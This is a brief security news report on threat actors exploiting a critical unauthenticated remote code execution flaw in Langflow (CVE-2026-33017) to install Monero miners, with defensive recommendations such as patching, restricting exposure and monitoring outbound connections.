Threat actors are actively exploiting a critical remote code execution vulnerability in Langflow, the popular open-source AI application development platform, to compromise exposed endpoints and deploy Monero cryptocurrency mining software.

The campaign weaponizes CVE-2026-33017, which carries a CVSS score of 9.3, reflecting the severity of the flaw. The vulnerability allows unauthenticated attackers to execute arbitrary code on affected Langflow instances, requiring no credentials or prior access to the targeted system.

Active Scanning and Exploitation

Researchers have observed threat actors conducting opportunistic scanning for publicly exposed Langflow deployments. Once a vulnerable instance is identified, attackers exploit the RCE flaw to gain execution on the host and subsequently deploy a Monero miner, a common payload choice given Monero’s privacy-focused design that makes transaction tracing significantly more difficult than with other cryptocurrencies.

The targeting of AI application infrastructure is consistent with a broader trend of attackers probing newly exposed attack surfaces created by the rapid deployment of AI development tools, many of which are stood up quickly and without hardened security configurations.

Recommendations

Security teams running Langflow instances should take the following steps immediately:

  • Apply available patches or updates to address CVE-2026-33017 without delay.
  • Audit network exposure and ensure Langflow instances are not publicly accessible unless strictly necessary.
  • Review host-based telemetry for signs of unauthorized process execution or anomalous outbound network connections indicative of mining activity.
  • Implement authentication controls and network segmentation around AI development infrastructure.

The continued exploitation of this flaw underscores that threat actors are monitoring disclosures closely and moving quickly against AI tooling that organizations may not be treating with the same urgency as traditional enterprise software.